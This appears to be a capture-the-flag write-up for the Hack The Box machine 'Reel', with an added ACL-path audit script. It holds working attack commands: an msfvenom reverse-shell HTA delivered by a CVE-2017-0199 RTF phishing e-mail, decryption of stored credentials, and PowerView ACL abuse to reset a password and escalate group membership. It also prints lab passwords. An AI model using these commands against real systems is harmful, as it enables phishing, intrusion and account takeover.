Target IP: 10.10.10.77

Key points

  • RTF phishing
  • ACL abuse: WriteOwner on a user object
  • ACL abuse: WriteDacl on a group object

Information gathering

nmap scan

nmap --min-rate 10000 -A -sV -sC -p- 10.10.10.77
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-10-27 13:44 CST
Nmap scan report for 10.10.10.77
Host is up (0.76s latency).
Not shown: 65527 filtered tcp ports (no-response)
PORT STATE SERVICE VERSION
21/tcp open ftp Microsoft ftpd
| ftp-syst:
|_ SYST: Windows_NT
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
|_05-28-18 11:19PM <DIR> documents
22/tcp open ssh OpenSSH 7.6 (protocol 2.0)
| ssh-hostkey:
| 2048 82:20:c3:bd:16:cb:a2:9c:88:87:1d:6c:15:59:ed:ed (RSA)
| 256 23:2b:b8:0a:8c:1c:f4:4d:8d:7e:5e:64:58:80:33:45 (ECDSA)
|_ 256 ac:8b:de:25:1d:b7:d8:38:38:9b:9c:16:bf:f6:3f:ed (ED25519)
25/tcp open smtp?
| smtp-commands: REEL, SIZE 20480000, AUTH LOGIN PLAIN, HELP
|_ 211 DATA HELO EHLO MAIL NOOP QUIT RCPT RSET SAML TURN VRFY
| fingerprint-strings:
| DNSStatusRequestTCP, DNSVersionBindReqTCP, Kerberos, LDAPBindReq, LDAPSearchReq, LPDString, NULL, RPCCheck, SMBProgNeg, SSLSessionReq, TLSSessionReq, X11Probe:
| 220 Mail Service ready
| FourOhFourRequest, GenericLines, GetRequest, HTTPOptions, RTSPRequest:
| 220 Mail Service ready
| sequence of commands
| sequence of commands
| Hello:
| 220 Mail Service ready
| EHLO Invalid domain address.
| Help:
| 220 Mail Service ready
| DATA HELO EHLO MAIL NOOP QUIT RCPT RSET SAML TURN VRFY
| SIPOptions:
| 220 Mail Service ready
| sequence of commands
| sequence of commands
| sequence of commands
| sequence of commands
| sequence of commands
| sequence of commands
| sequence of commands
| sequence of commands
| sequence of commands
| sequence of commands
| sequence of commands
| TerminalServerCookie:
| 220 Mail Service ready
|_ sequence of commands
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
445/tcp open microsoft-ds Windows Server 2012 R2 Standard 9600 microsoft-ds (workgroup: HTB)
593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
49159/tcp open msrpc Microsoft Windows RPC
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
...
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: specialized
Running (JUST GUESSING): Microsoft Windows 7 (85%)
OS CPE: cpe:/o:microsoft:windows_7
Aggressive OS guesses: Microsoft Windows Embedded Standard 7 (85%)
No exact OS matches for host (test conditions non-ideal).
Network Distance: 2 hops
Service Info: Host: REEL; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
| smb-os-discovery:
| OS: Windows Server 2012 R2 Standard 9600 (Windows Server 2012 R2 Standard 6.3)
| OS CPE: cpe:/o:microsoft:windows_server_2012::-
| Computer name: REEL
| NetBIOS computer name: REEL\x00
| Domain name: HTB.LOCAL
| Forest name: HTB.LOCAL
| FQDN: REEL.HTB.LOCAL
|_ System time: 2024-10-27T05:48:32+00:00
| smb-security-mode:
| account_used: guest
| authentication_level: user
| challenge_response: supported
|_ message_signing: required
| smb2-time:
| date: 2024-10-27T05:48:28
|_ start_date: 2024-10-27T05:35:31
| smb2-security-mode:
| 3:0:2:
|_ Message signing enabled and required
|_clock-skew: mean: 2s, deviation: 3s, median: 0s

TRACEROUTE (using port 445/tcp)
HOP RTT ADDRESS
1 644.73 ms 10.10.16.1
2 961.24 ms 10.10.10.77

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 263.65 seconds

Ports 21, 22, 25 and several others are open, and the script scan output shows the host's FQDN is REEL.HTB.LOCAL in the domain HTB.LOCAL; add both names to /etc/hosts.

FTP

The scan results show that the FTP server allows anonymous login.

ftp anonymous@10.10.10.77

Three files are found; download all of them.

prompt off
mget *

Review all of them.

  • readme.txt

It says that documents are to be sent by e-mail in RTF format, and that all documents are saved in this directory.

  • AppLocker.docx

  • Windows Event Forwarding.docx

This file turns out to be corrupted when opened, so inspect its metadata with exiftool.

exiftool Windows\ Event\ Forwarding.docx

The metadata contains an e-mail address: nico@megabank.com

RTF phishing

Vulnerability: CVE-2017-0199

Generate an HTA payload with msfvenom

msfvenom -p windows/shell_reverse_tcp LHOST=10.10.16.4 LPORT=8888 -f hta-psh -o shell.hta

Use the script from the CVE-2017-0199 toolkit to create an RTF file

python2 CVE-2017-0199/cve-2017-0199_toolkit.py -M gen -w shell.rtf -u http://10.10.16.4/shell.hta -t rtf -x 0

Start an HTTP server first, then set up an nc listener.

Send the e-mail with sendEmail

sendEmail -f root@admin.com -t nico@megabank.com -u "look me" -m "click me" -a shell.rtf -s 10.10.10.77 -v

After roughly 30 seconds a shell comes back.

user.txt is found here.

nico -> Tom

There is also a cred.xml on nico's desktop; take a look at it.

It contains tom's username and password.

PowerShell's PSCredential object provides a way to store a username, password and credentials. Two cmdlets, Export-CliXml and Import-CliXml, save such credentials to a file and restore them from it.

Load the file with Import-CliXml to recover the plaintext password

powershell -c "$cred = Import-CliXml -Path cred.xml; $cred.GetNetworkCredential() | Format-List *"

Tom's plaintext password is 1ts-mag1c!!!

Try logging in over ssh

ssh tom@10.10.10.77

AD Privesc

There is an AD Audit directory on the desktop.

Look at note.txt first.

Then look at the other files.

Following the hint and trying it out, SharpHound.exe will not run, so BloodHound cannot be used for collection; the focus is therefore on acls.csv.

Download the file with scp

scp Tom@10.10.10.77:'/Users/tom/Desktop/AD Audit/BloodHound/Ingestors/acls.csv' ./

It is an export of ACLs. To analyse it, first filter the PrincipalName column for Tom.

Tom has the WriteOwner right over claire; next, search for claire.

claire has the WriteDacl right over the Backup_Admins group.
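The manual filtering above (Tom -> claire via WriteOwner, claire -> Backup_Admins via WriteDacl) can be automated as an audit: the script below, an added example that is not part of the original writeup, loads an acls.csv-style export and searches for chains of takeover rights from a principal to a privileged group, so that such ACEs can be found and removed. The column names and the sample rows are assumptions modelled on the SharpHound CSV format, not the real file.

```python
import csv
import io
from collections import defaultdict

# Constructed sample in the shape of a SharpHound acls.csv export.
# The header names are an assumption; adjust them to the real file's header.
SAMPLE_ACLS_CSV = """\
ObjectName,ObjectType,PrincipalName,PrincipalType,ActiveDirectoryRights,ACEType,AccessControlType,IsInherited
claire@HTB.LOCAL,USER,tom@HTB.LOCAL,USER,WriteOwner,,AccessAllowed,False
BACKUP_ADMINS@HTB.LOCAL,GROUP,claire@HTB.LOCAL,USER,WriteDacl,,AccessAllowed,False
tom@HTB.LOCAL,USER,nico@HTB.LOCAL,USER,GenericRead,,AccessAllowed,False
BACKUP_ADMINS@HTB.LOCAL,GROUP,DOMAIN ADMINS@HTB.LOCAL,GROUP,GenericAll,,AccessAllowed,True
"""

# Rights that let the holder take control of the target object.
DANGEROUS_RIGHTS = {"GenericAll", "GenericWrite", "WriteDacl", "WriteOwner",
                    "WriteProperty", "AllExtendedRights", "ForceChangePassword"}

def load_edges(text):
    """Return {principal: [(target, right), ...]} for allowed dangerous ACEs."""
    edges = defaultdict(list)
    for row in csv.DictReader(io.StringIO(text)):
        right = row["ActiveDirectoryRights"]
        if right in DANGEROUS_RIGHTS and row["AccessControlType"] == "AccessAllowed":
            edges[row["PrincipalName"].lower()].append((row["ObjectName"].lower(), right))
    return edges

def find_paths(edges, start, goal, max_depth=6):
    """Depth-first search for chains start -> ... -> goal over dangerous ACEs."""
    paths = []
    def walk(node, path, seen):
        if node == goal:
            paths.append(list(path))
            return
        if len(path) >= max_depth:
            return
        for target, right in edges.get(node, []):
            if target not in seen:  # avoid cycles such as mutual WriteDacl
                walk(target, path + [(node, right, target)], seen | {target})
    walk(start, [], {start})
    return paths

def format_path(path):
    """Render a path as 'a -[Right]-> b -[Right]-> c'."""
    out = path[0][0]
    for _, right, dst in path:
        out += f" -[{right}]-> {dst}"
    return out

if __name__ == "__main__":
    edges = load_edges(SAMPLE_ACLS_CSV)
    for p in find_paths(edges, "tom@htb.local", "backup_admins@htb.local"):
        print(format_path(p))
```

On the real export, run the search from every low-privileged user toward Domain Admins and the backup/operator groups; each reported chain is an ACE to review rather than a path to use.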

Tom->claire

Recall that PowerView.ps1 was already present on the machine when logged in as tom.

So we use the WriteOwner right together with PowerView.ps1 to gain access to claire.

The steps are:

  • Become the owner of claire's object and its ACL
  • Grant ourselves the required right on that ACL
  • Use that right to change the password

Import PowerView.ps1 first

. .\PowerView.ps1

Set Tom as the owner of claire's object

Set-DomainObjectOwner -identity claire -OwnerIdentity tom

Give Tom the right to reset the password via the ACL

Add-DomainObjectAcl -TargetIdentity claire -PrincipalIdentity tom -Rights ResetPassword

Finally create a new password and set it for claire

$pass = ConvertTo-SecureString "Aa123456!" -AsPlainText -force
Set-DomainUserPassword -identity claire -accountpassword $pass

Then log in as claire over ssh.

claire->Backup_Admins

From the earlier ACL analysis, claire has WriteDacl over the Backup_Admins group, which can be used to add claire to that group.

First look at Backup_Admins

net group backup_admins

The only current member is ranj.

Now add claire

net group backup_admins claire /add

Check Backup_Admins again

net group backup_admins

claire is now a member of the Backup_Admins group; log in again for the new membership to take effect.

ps: if logging in again does not work, repeat the Tom->claire steps.

Backup_Admins->Administrator

We are now logged in as claire and are a member of Backup_Admins,

which means we have permission to read the Administrator's files.

root.txt is found, but we do not have permission to read it. There is a Backup Scripts directory; look inside it.

Finally, the Administrator password Cr4ckMeIfYouC4n! is found in the BackupScript.ps1 file.

ssh login

ssh Administrator@10.10.10.77

root.txt is finally readable.